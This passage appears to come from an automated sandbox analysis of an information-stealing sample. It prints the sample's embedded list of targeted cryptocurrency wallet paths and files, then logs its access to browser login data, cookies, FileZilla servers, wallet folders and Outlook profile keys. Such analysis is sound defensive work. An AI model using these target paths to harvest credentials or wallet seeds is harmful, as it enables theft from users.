Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Tries to harvest and steal Bitcoin Wallet information
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-walJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shmJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Tries to harvest and steal ftp login credentials
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                            Tries to steal Crypto Currency Wallets
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                            Tries to steal Mail credentials (via file / registry access)
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
